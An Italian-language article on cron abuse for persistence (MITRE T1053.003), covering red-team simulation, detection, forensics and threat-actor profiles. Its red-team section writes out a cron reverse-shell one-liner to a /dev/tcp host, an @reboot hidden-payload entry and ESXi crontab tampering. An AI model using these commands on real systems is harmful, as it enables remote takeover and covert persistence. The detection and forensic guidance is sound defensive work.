Job Malevoli su Cron: Scheduled Task/Job – Cron (T1053.003)

L'abuso di cron è tra le tecniche di persistenza più semplici da simulare in laboratorio, ma la varietà di percorsi e formati crontab richiede attenzione al contesto operativo: un Red Teamer deve adattare la catena d'attacco al sistema target — distribuzione Linux, macOS o ESXi.

Persistenza base su Linux. Il modo più diretto è iniettare una voce nel crontab dell'utente corrente. Il comando classico appende una reverse shell che si attiva ogni minuto:

echo ' * * * * /bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' | crontab -*

Se l'accesso è root, si può scrivere direttamente nel crontab di sistema. Molte distribuzioni leggono i file in /etc/cron.d/, dove basta creare un file con sintassi crontab standard — nessun bisogno di invocare il binario crontab. Questo secondo approccio è più silenzioso perché non genera i log tipici dell'utility interattiva.

Simulazione della catena Kinsing. Per replicare il comportamento di Kinsing, che scarica e rilancia uno script ogni sessanta secondi, si può costruire un cron entry che esegue un downloader minimale con curl e lo pipe in bash. In laboratorio, il C2 può essere un semplice listener HTTP su Cobalt Strike (a pagamento) o Sliver (open source), con uno stager shell che restituisce il payload.

Contesto macOS. Su macOS il demone cron è ancora funzionante, sebbene Apple spinga verso launchd. Un ethical hacker può dimostrare la persistenza via crontab con:

crontab -l 2>/dev/null; echo '@reboot /tmp/.hidden_payload' | crontab -

La variante @reboot è la stessa utilizzata dalla versione Linux di GoldMax e garantisce la riesecuzione ad ogni avvio.

Ambienti ESXi. Su VMware ESXi il crontab si modifica a mano: il file da editare è /var/spool/cron/crontabs/root. Dopo la modifica è necessario segnalare il demone con un reload:

kill -SIGHUP $(cat /var/run/crond.pid)

In un engagement, è utile testare anche la persistenza tramite /etc/rc.local.d/local.sh, spesso abusato insieme a cron per garantire doppia ridondanza.

Per il reporting, Atomic Red Team (open source) del progetto Red Canary offre test atomici per T1053.003 già pronti, con istruzioni di cleanup. Lo strumento pspy (open source) è utile al Blue Team di verifica per osservare l'esecuzione dei cron job senza privilegi root, confermando la riuscita della simulazione.

Rilevare l'abuso di cron richiede visibilità su due momenti distinti: la scrittura della voce nel crontab e l'esecuzione del comando pianificato. Concentrarsi solo su uno dei due genera punti ciechi.

Log source primari. Su Linux, la sorgente irrinunciabile è auditd (open source, preinstallato nella maggior parte delle distribuzioni). Una regola audit che sorveglia le scritture sui percorsi crontab cattura sia l'uso interattivo del binario crontab sia la manipolazione diretta dei file. La detection AN0805 si basa proprio sugli eventi auditd:SYSCALL per intercettare creazioni o modifiche da parte di utenti non-root o da processi padre anomali. Il tuning fondamentale riguarda i percorsi di sistema — che variano tra distribuzioni — e la definizione di quali utenti siano legittimamente autorizzati a pianificare job.

Su macOS, la detection AN0806 sfrutta lo Unified Log e il monitoraggio del filesystem tramite fs:fsusage. Gli alert più efficaci incrociano due segnali: la scrittura del crontab da una shell interattiva e il puntamento a script nascosti (dot-file) o binari rinominati. Filtrare per la frequenza dell'espressione cron — ogni minuto, wildcard su tutti i campi — riduce drasticamente i falsi positivi legati ai job amministrativi ordinari.

Per ESXi, il log esxi:cron combinato con esxi:hostd e esxi:vmkernel offre la telemetria necessaria (AN0807). Il SOC deve monitorare le modifiche al file /var/spool/cron/crontabs/root e al file local.sh nella directory rc.local.d, verificando che gli intervalli di esecuzione non siano anomali.

Controlli preventivi. Le due mitigazioni ufficiali forniscono la base: l'Audit (M1047) chiede di monitorare i log cron in /var/log e verificare la configurazione syslog in /etc/rsyslog.conf per assicurarsi che gli eventi vengano effettivamente registrati. Lo User Account Management (M1018) ricorda che i file /etc/cron.allow e /etc/cron.deny controllano chi può usare il binario crontab. Se cron.allow non esiste e cron.deny nemmeno, solo root può pianificare — una configurazione restrittiva che molti ambienti non adottano.

Gestione falsi positivi. I job legittimi di update, backup e monitoring generano rumore. Una whitelist basata su percorso dello script, utente proprietario e frequenza di scheduling permette al SIEM — Splunk (a pagamento), Elastic Security (freemium) o Wazuh (open source) — di scartare il noto e far emergere l'anomalo.

L'analisi forense di un cron job malevolo si articola su tre assi: il file crontab stesso, i log di esecuzione e gli artefatti sul filesystem generati dal payload.

Crontab e spool directory. Il primo passo è acquisire tutti i crontab utente e di sistema. I file utente risiedono in /var/spool/cron/crontabs/<username> sulla maggior parte delle distribuzioni Debian-based, e in /var/spool/cron/<username> su Red Hat e derivati. I crontab di sistema sono in /etc/crontab e nella directory /etc/cron.d/. Su ESXi, il percorso è /var/spool/cron/crontabs/root. Ogni file va acquisito con hash e timestamp MAC (Modified, Accessed, Changed) tramite stat, dato che la data di modifica del file crontab è il primo ancoraggio temporale della persistenza.

Per estrarre rapidamente tutte le entry crontab di tutti gli utenti su un sistema Linux:

for user in $(cut -f1 -d: /etc/passwd); do echo "--- $user ---"; crontab -l -u $user 2>/dev/null; done

Log cron. Il file /var/log/cron (Red Hat) o /var/log/syslog (Debian/Ubuntu, filtrando per il tag CRON) contiene le tracce di ogni esecuzione. Ogni riga riporta timestamp, utente e comando eseguito. Incrociando questi log con la timeline del filesystem è possibile ricostruire non solo quando il job ha iniziato a girare, ma anche cosa ha scaricato o eseguito ad ogni ciclo.

Nel caso della campagna Operation MidnightEclipse (C0048), i cron job venivano configurati per recuperare payload da infrastruttura controllata dall'attaccante, sfruttando la vulnerabilità CVE-2024-3400 su PAN-OS. Un analista forense che indaghi un caso simile deve correlare le entry crontab con i log di rete dell'appliance per ricostruire la catena completa: exploit iniziale → creazione cron → download payload → esecuzione.

Artefatti auditd. Se auditd era attivo al momento della compromissione, i record di tipo SYSCALL relativi a open() o openat() sui file crontab contengono il PID del processo che ha scritto la voce, il percorso completo e l'utente effettivo. Questi dati sono fondamentali per attribuire la creazione del job a un processo specifico nella catena di attacco.

Timeline macOS. Su macOS, oltre al crontab, va verificato il database FSEvents e lo Unified Log con il predicato subsystem == "com.apple.cron". Janicab è un esempio documentato di malware che ha usato cron per la persistenza su dispositivi Mac, rendendo questi artefatti direttamente rilevanti.

Lo strumento Plaso/log2timeline (open source) è particolarmente adatto a consolidare tutte queste fonti in una supertimeline unica, normalizzando i formati tra Linux, macOS e log di appliance.

L'abuso di cron attraversa attori con motivazioni, capacità e targeting molto diversi. Mappare queste differenze è essenziale per costruire modelli predittivi.

Rocke (G0106) rappresenta il profilo finanziariamente motivato, focalizzato su cryptomining. Il gruppo installa cron job che scaricano ed eseguono file dal C2, una catena deliberatamente semplice e resiliente: anche se il payload viene rimosso, il job lo ri-scarica al ciclo successivo. Questo pattern — download ricorrente via cron — è condiviso con Kinsing (S0599), che opera con cadenza al minuto. Per un analista TI, l'overlap tra Rocke e Kinsing suggerisce un ecosistema di attori cloud-focused che condividono infrastruttura e TTP per colpire container e server Linux esposti.

APT5 (G1023) e APT38 (G0082) elevano il livello di sofisticazione. APT5 modifica il crontab includendo percorsi non standard come /var/cron/tabs/, un indicatore che l'operatore conosce varianti di sistema meno comuni — tipico di attori che operano contro infrastrutture di telecomunicazioni e tecnologia. APT38, attribuito ad attività legate alla Corea del Nord, utilizza cron per job pre-pianificati e periodici su sistemi Linux, integrandolo in catene d'attacco orientate al furto finanziario. La differenza di targeting — tecnologia per APT5, settore finanziario per APT38 — si riflette nel modo in cui il cron job viene impiegato: accesso persistente a lungo termine nel primo caso, staging di operazioni in finestre temporali precise nel secondo.

Operation MidnightEclipse (C0048) rappresenta un caso particolarmente istruttivo. La campagna di marzo-aprile 2024 combinava lo sfruttamento dello zero-day CVE-2024-3400 su PAN-OS con cron job configurati per il retrieval di payload da infrastruttura attaccante. Questo pattern — exploit su appliance di rete + persistenza cron — segnala un trend emergente: gli attori spostano la persistenza su dispositivi dove EDR e monitoring tradizionali hanno visibilità limitata.

Sul fronte malware, la distribuzione dei 12 software documenta una copertura multipiattaforma preoccupante. GoldMax usa la direttiva @reboot nella sua variante Linux — la stessa tecnica che potrebbe essere portata su qualsiasi sistema con cron. Gomir (S1198) implementa una logica condizionale: attiva il crontab solo se non è in esecuzione con privilegi del gruppo 0, dimostrando un livello di consapevolezza ambientale evoluto. Exaramel for Linux (S0401) applica una logica inversa: usa cron proprio quando non ha privilegi root, come fallback di persistenza a privilegi ridotti.

Il trend complessivo è chiaro: cron resta un meccanismo di persistenza "low and slow" che attraversa tutto lo spettro degli attori, dal cryptominer opportunistico all'APT nation-state. Per gli ambienti ESXi e le appliance di rete, dove la telemetria è strutturalmente carente, la priorità è sviluppare collezioni ad hoc prima ancora di scrivere regole di detection.

Framework MITRE ATT&CK v16 — Tecnica T1053.003 (Cron), Tattiche TA0002, TA0003, TA0004. Campagna C0048 (Operation MidnightEclipse). Detection: Atomic Red Team, auditd, Plaso/log2timeline, pspy, Wazuh, Elastic Security, Splunk. Integrato con conoscenza professionale per tool e procedure operative.